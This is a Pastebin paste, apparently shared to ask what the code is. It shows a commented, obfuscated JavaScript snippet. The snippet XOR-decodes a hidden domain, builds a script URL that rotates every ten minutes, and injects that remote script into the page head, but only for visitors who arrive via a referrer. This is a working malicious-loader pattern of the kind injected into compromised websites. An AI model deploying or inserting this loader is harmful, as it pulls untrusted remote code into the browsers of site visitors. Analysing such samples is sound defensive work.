Advertisement
Guest User

uwu whats this

a guest
Jun 18th, 2024
48
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <script type="text/javascript">
  2. !function (_d52b9a) {
  3.  
  4.     // Get the current time in milliseconds since epoch
  5.     var _2e0d87 = Date.now();
  6.     var _9b59ad = 1000;
  7.  
  8.     // Convert time to seconds
  9.     _2e0d87 = _2e0d87 / _9b59ad;
  10.  
  11.     // Round down to the nearest integer
  12.     _2e0d87 = Math.floor(_2e0d87);
  13.  
  14.     // Normalize time to the nearest multiple of 600 seconds
  15.     var _f6c48 = 600;
  16.     _2e0d87 -= _2e0d87 % _f6c48;
  17.  
  18.     // Convert normalized time to a hexadecimal string
  19.     _2e0d87 = _2e0d87.toString(16);
  20.  
  21.     // Get the referrer URL
  22.     var _2edadb = _d52b9a.referrer;
  23.  
  24.     // If no referrer, stop executing the script
  25.     if (!_2edadb) return;
  26.  
  27.     // Encoded array of numbers
  28.     var _a93890 = [27282, 27267, 27267, 27264, 27357, 27294, 27282, 27265, 27288, 27286, 27271, 27290, 27293, 27284, 27358, 27280, 27292, 27270, 27293, 27271, 27286, 27265, 27357, 27280, 27292, 27294];
  29.  
  30.     // Decode the array by XORing each number with 27379
  31.     _a93890 = _a93890.map(function(_da28c9){
  32.         return _da28c9 ^ 27379;
  33.     });
  34.  
  35.     // Convert the decoded array to a string
  36.     _a93890 = String.fromCharCode(..._a93890);
  37.  
  38.     // Possibly a token or key for verification
  39.     var _bfc935 = "91eacaf520cd35dda1ff37c4100d41c0";
  40.    
  41.     // URL components
  42.     var _c919c6 = "https://";
  43.     var _4dca08 = "/";
  44.     var _35818 = "app.";
  45.     var _31481f = ".js";
  46.  
  47.     // Create a new script element
  48.     var _5d4b0b = _d52b9a.createElement("script");
  49.     _5d4b0b.type = "text/javascript";
  50.     _5d4b0b.async = true;
  51.  
  52.     // Set the source of the script element to the constructed URL
  53.     _5d4b0b.src = _c919c6 + _a93890 + _4dca08 + _35818 + _2e0d87 + _31481f;
  54.  
  55.     // Append the new script element to the head of the document
  56.     _d52b9a.getElementsByTagName("head")[0].appendChild(_5d4b0b);
  57.  
  58. }(document);
  59. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement